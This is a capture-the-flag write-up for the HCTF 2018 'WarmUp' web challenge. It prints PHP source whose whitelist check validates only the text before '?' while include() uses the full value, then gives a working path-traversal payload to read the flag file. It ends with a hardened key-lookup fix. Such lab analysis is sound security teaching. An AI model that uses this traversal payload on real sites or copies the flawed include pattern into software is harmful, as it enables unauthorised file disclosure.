BUUCTF [HCTF 2018] WarmUp
2020-02-07 14:00
The challenge opens with nothing but an image, so go straight to the page source.
The source contains a comment pointing at source.php.
Visiting source.php gives the PHP source of the challenge:
```php
<?php
highlight_file(__FILE__);
class emmm
{
    public static function checkFile(&$page)
    {
        $whitelist = ["source"=>"source.php","hint"=>"hint.php"];
        if (! isset($page) || !is_string($page)) {
            echo "you can't see it";
            return false;
        }

        // Check 1: the raw value is whitelisted
        if (in_array($page, $whitelist)) {
            return true;
        }
        // Check 2: the part before the first '?' is whitelisted
        $_page = mb_substr(
            $page,
            0,
            mb_strpos($page . '?', '?')
        );
        if (in_array($_page, $whitelist)) {
            return true;
        }

        // Check 3: same as check 2, after one urldecode()
        $_page = urldecode($page);
        $_page = mb_substr(
            $_page,
            0,
            mb_strpos($_page . '?', '?')
        );
        if (in_array($_page, $whitelist)) {
            return true;
        }
        echo "you can't see it";
        return false;
    }
}

// The raw request value, not the truncated copy, is what gets included
if (! empty($_REQUEST['file'])
    && is_string($_REQUEST['file'])
    && emmm::checkFile($_REQUEST['file'])
) {
    include $_REQUEST['file'];
    exit;
} else {
    echo "<br><img src=\"https://i.loli.net/2018/11/01/5bdb0d93dc794.jpg\" />";
}
?>
```
The source also mentions hint.php; visiting it shows:
flag not here, and flag in ffffllllaaaagggg
So the flag should be in the file ffffllllaaaagggg.
```php
$whitelist = ["source"=>"source.php","hint"=>"hint.php"];
```
The whitelist means only source.php and hint.php are accepted as-is.
```php
$_page = mb_substr( $page, 0, mb_strpos($page . '?', '?') ); if (in_array($_page, $whitelist)) { return true; }
```
Here $_page is $page truncated from position 0 up to the first question mark (a '?' is appended before searching, so there is always one to find); only this truncated prefix is compared against the whitelist, while the full, untruncated value is what ends up in include.
So a value of the form source.php?.. or hint.php?.. passes the check.
After that, ../../ in the request traverses up through the directories to reach and read the flag file.
Final payload:
file=hint.php?/../../../../../../../../ffffllllaaaagggg
Visiting it returns the flag.
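To make the three-step check and its fix concrete, here is an added example (not the challenge's own code): the checkFile logic reduced to a pure function, traced over a few constructed inputs including the payload above, next to a hardened lookup that uses the request value only as a key into the map. The whitelist, sample values and function names are mine.

```php
<?php
// Added example, not the challenge's code. Mirrors the three checks of
// emmm::checkFile as a pure function so they can be traced with sample input.
const WHITELIST = ["source" => "source.php", "hint" => "hint.php"];

// Returns true when the raw value, or everything before its first '?'
// (before or after one urldecode()), matches a whitelist entry.
function vulnerableCheck(string $page): bool {
    if (in_array($page, WHITELIST)) {            // check 1: raw value
        return true;
    }
    $prefix = mb_substr($page, 0, mb_strpos($page . '?', '?'));
    if (in_array($prefix, WHITELIST)) {          // check 2: prefix before '?'
        return true;
    }
    $decoded = urldecode($page);
    $prefix = mb_substr($decoded, 0, mb_strpos($decoded . '?', '?'));
    return in_array($prefix, WHITELIST);         // check 3: same after urldecode
}

// Hardened variant (assumed fix, not from the challenge): the request value is
// only ever a KEY into the map, so the string reaching include() is always one
// of our own literals and the truncation logic disappears entirely.
function resolveAllowedFile(string $key): ?string {
    return WHITELIST[$key] ?? null;
}

// Constructed sample inputs
$samples = [
    "source.php",                                // legitimate request
    "hint",                                      // key form used by the hardened lookup
    "hint.php?/../../../../ffffllllaaaagggg",    // the writeup's payload: passes check 2
    "hint.php%3F/../../../../ffffllllaaaagggg",  // '?' still encoded: passes check 3
    "../../../../ffffllllaaaagggg",              // no whitelisted prefix: rejected by both
];
foreach ($samples as $s) {
    printf("%-44s original=%-6s hardened=%s\n", $s,
        vulnerableCheck($s) ? "pass" : "reject",
        resolveAllowedFile($s) ?? "reject");
}
```

The traversal works because the original code includes the full string rather than the prefix it validated; with the hardened lookup, ?file=hint resolves to hint.php and every other value is rejected before include runs.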